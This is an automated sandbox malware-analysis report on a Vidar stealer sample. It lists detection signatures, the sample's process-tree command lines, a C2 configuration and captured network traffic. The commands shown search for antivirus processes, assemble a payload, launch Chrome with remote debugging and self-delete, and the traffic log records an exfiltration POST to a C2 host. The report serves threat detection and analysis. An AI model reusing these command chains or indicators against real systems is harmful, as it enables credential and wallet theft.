Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yoda.exe

Overview

General Information

Sample name:yoda.exe
Analysis ID:1581176
MD5:79884836c406ae143bc31aeadfa81e70
SHA1:3a38f9b4cf9fc75a0b6ec34230e431e0c4b7c1a2
SHA256:47d48f2753f7eab065480d9b125c1429a7943ed1fbb408e3076d7a3e3102bd0c
Tags:exeVidaruser-lontze7
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • yoda.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\yoda.exe" MD5: 79884836C406AE143BC31AEADFA81E70)
    • cmd.exe (PID: 7360 cmdline: "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7448 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7460 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7500 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7508 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7544 cmdline: cmd /c md 314782 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7560 cmdline: findstr /V "INSPIRED" Interview MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7576 cmdline: cmd /c copy /b ..\Qualifications + ..\Iso + ..\Processor + ..\Luther A MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Iceland.com (PID: 7592 cmdline: Iceland.com A MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 7980 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 3844 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=2176,i,7491124011227582456,6124971309095306324,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • cmd.exe (PID: 7392 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\314782\Iceland.com" & rd /s /q "C:\ProgramData\4EK6XL68GLNY" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 5688 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 7608 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000A.00000003.1950389528.0000000000E6B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000A.00000002.2871233735.0000000003971000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        0000000A.00000002.2868559733.0000000000ED3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0000000A.00000003.1950013637.0000000003795000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000000A.00000003.1949965283.0000000000E48000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 6 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              10.2.Iceland.com.3970000.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                10.2.Iceland.com.3970000.1.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
                • 0x2068c:$str01: MachineID:
                • 0x1f051:$str02: Work Dir: In memory
                • 0x206c3:$str03: [Hardware]
                • 0x20675:$str04: VideoCard:
                • 0x1fce5:$str05: [Processes]
                • 0x1fcf1:$str06: [Software]
                • 0x1f1bb:$str07: information.txt
                • 0x20398:$str08: %s\*
                • 0x203e5:$str08: %s\*
                • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
                • 0x1fb61:$str12: UseMasterPassword
                • 0x206cf:$str13: Soft: WinSCP
                • 0x2016e:$str14: <Pass encoding="base64">
                • 0x206b2:$str15: Soft: FileZilla
                • 0x1f1ad:$str16: passwords.txt
                • 0x1fb8c:$str17: build_id
                • 0x1fc80:$str18: file_data

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Browser Started with Remote Debugging
                Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Iceland.com A, ParentImage: C:\Users\user\AppData\Local\Temp\314782\Iceland.com, ParentProcessId: 7592, ParentProcessName: Iceland.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7980, ProcessName: chrome.exe
                Sigma detected: Suspicious Copy From or To System Directory
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\yoda.exe", ParentImage: C:\Users\user\Desktop\yoda.exe, ParentProcessId: 7320, ParentProcessName: yoda.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd, ProcessId: 7360, ProcessName: cmd.exe

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Sigma detected: Search for Antivirus process
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7360, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7508, ProcessName: findstr.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T07:09:38.030778+010020442471Malware Command and Control Activity Detected188.245.216.205443192.168.2.449743TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T07:09:40.415459+010020518311Malware Command and Control Activity Detected188.245.216.205443192.168.2.449744TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T07:09:35.450295+010020490871A Network Trojan was detected192.168.2.449742188.245.216.205443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T07:09:32.959230+010028593781Malware Command and Control Activity Detected192.168.2.449740188.245.216.205443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 0000000A.00000002.2868559733.0000000000ED3000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Multi AV Scanner detection for submitted file
                Source: yoda.exeVirustotal: Detection: 32%Perma Link
                Source: yoda.exeReversingLabs: Detection: 55%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.2% probability
                Source: yoda.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: yoda.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cryptosetup.pdbGCTL source: Iceland.com, 0000000A.00000002.2872631842.0000000005F92000.00000004.00000800.00020000.00000000.sdmp, 2NG4E3.10.dr
                Source: Binary string: cryptosetup.pdb source: Iceland.com, 0000000A.00000002.2872631842.0000000005F92000.00000004.00000800.00020000.00000000.sdmp, 2NG4E3.10.dr
                Source: C:\Users\user\Desktop\yoda.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\yoda.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A8DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00A8DC54
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A9A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A9A087
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A9A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A9A1E2
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A8E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00A8E472
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A9A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00A9A570
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A966DC FindFirstFileW,FindNextFileW,FindClose,10_2_00A966DC
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A5C622 FindFirstFileExW,10_2_00A5C622
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00A973D4
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A97333 FindFirstFileW,FindClose,10_2_00A97333
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A8D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00A8D921
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\314782Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\314782\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: chrome.exeMemory has grown: Private usage: 8MB later: 41MB

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49740 -> 188.245.216.205:443
                Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49742 -> 188.245.216.205:443
                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.216.205:443 -> 192.168.2.4:49744
                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.216.205:443 -> 192.168.2.4:49743
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknownTCP traffic detected without corresponding DNS query: 152.199.19.74
                Source: unknownTCP traffic detected without corresponding DNS query: 152.199.19.74
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A9D889 InternetReadFile,SetEvent,GetLastError,SetEvent,10_2_00A9D889
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 0000000F.00000003.2146021849.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2146673607.0000027800F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2146745669.00000278002F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 0000000F.00000003.2146021849.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2146673607.0000027800F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2146745669.00000278002F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                Source: chrome.exe, 0000000F.00000002.2214811051.00000278002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: pXJlKZlafjPwNXLLYZe.pXJlKZlafjPwNXLLYZe
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: global trafficDNS traffic detected: DNS query: bijutr.shop
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----XT0RIWTJM7GV3E3OPZU3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopContent-Length: 255Connection: Keep-AliveCache-Control: no-cache
                Source: chrome.exe, 0000000F.00000002.2215402972.0000027800474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                Source: chrome.exe, 0000000F.00000003.2138022248.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2142012072.00000278007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
